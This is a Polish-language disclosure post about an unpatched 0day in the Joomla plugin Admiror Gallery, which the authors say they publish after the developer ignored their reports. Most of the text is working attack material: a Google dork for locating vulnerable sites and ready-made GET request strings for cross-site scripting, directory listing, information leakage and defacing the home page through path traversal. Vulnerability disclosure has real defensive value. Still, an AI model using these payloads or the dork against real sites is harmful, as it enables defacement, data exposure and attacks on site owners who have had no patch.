Jakiś czas temu, odnaleźliśmy lukę typu 0Day w Galerii zdjęć Joomla o nazwie Admiror Gallery – po wielokrotnych zgłoszeniach nie otrzymaliśmy żadnych informacji od twórcy, w związku z czym poczuwamy się do obowiązku aby naświetlić sytuację i przestrzec Was przed atakiem na Waszą aplikację.
Link do pluginu:
http://www.admiror-design-studio.com/admiror-joomla-extensions/admiror-gallery
Google Dork:
AG_form_albumInitFolders_1
Podatne parametry:
GET: ?AG_form_albumInitFolders_1=path/ //Path traversal/Directory Listing/Information Leakage
GET: ?AG_form_scrollTop=0 //XSS (onload)
Przykład XSS:
?AG_MK=0&AG_form_paginInitPages_1=1&AG_form_albumInitFolders_1=APG/b&AG_form_scrollTop=0);alert(1&AG_form_scrollLeft=0&AG_MK=0
Przykład Path traversal - Information Leakage:
?AG_MK=0&AG_form_paginInitPages_1=1&AG_form_albumInitFolders_1=APG/path&AG_form_scrollTop=0&AG_form_scrollLeft=0&AG_MK=0
Przykład usage Path traversal - Directory Listing:
?AG_MK=0&AG_form_paginInitPages_1=1&AG_form_albumInitFolders_1=APG/.&AG_form_scrollTop=0&AG_form_scrollLeft=0&AG_MK=0
Przykład usage Path traversal – podmiana strony głównej poprzez utworzenie pustego index.html:
?AG_MK=0&AG_form_paginInitPages_1=1&AG_form_albumInitFolders_1=APG/..&AG_form_scrollTop=0&AG_form_scrollLeft=0&AG_MK=0?AG_MK=0&AG_form_paginInitPages_1=1&AG_form_albumInitFolders_1=APG/../..&AG_form_scrollTop=0&AG_form_scrollLeft=0&AG_MK=0